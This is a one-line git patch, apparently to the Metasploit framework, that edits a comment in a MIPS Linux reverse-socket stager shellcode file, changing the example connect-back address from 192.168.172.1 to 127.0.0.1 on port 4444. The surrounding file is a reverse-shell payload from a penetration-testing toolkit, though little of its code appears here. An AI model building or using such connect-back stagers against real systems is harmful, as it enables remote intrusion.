From b9f5ebcf663934fd95eb4f144e883a7ea4ab628f Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 11 Jul 2017 00:58:03 +0800 Subject: [PATCH] update comment --- external/source/shellcode/linux/mipsle/stager_sock_reverse.s | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/external/source/shellcode/linux/mipsle/stager_sock_reverse.s b/external/source/shellcode/linux/mipsle/stager_sock_reverse.s index 2acdac58e6..1c23424fa9 100644 --- a/external/source/shellcode/linux/mipsle/stager_sock_reverse.s +++ b/external/source/shellcode/linux/mipsle/stager_sock_reverse.s @@ -51,7 +51,7 @@ main: bne $s0, $zero, failed sw $v0, -4($sp) # store the file descriptor for the socket on the stack - # connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16) + # connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("127.0.0.1")}, 16) # a0: sockfd # a1: addr = AF_INET (2) # a2: addrlen = 16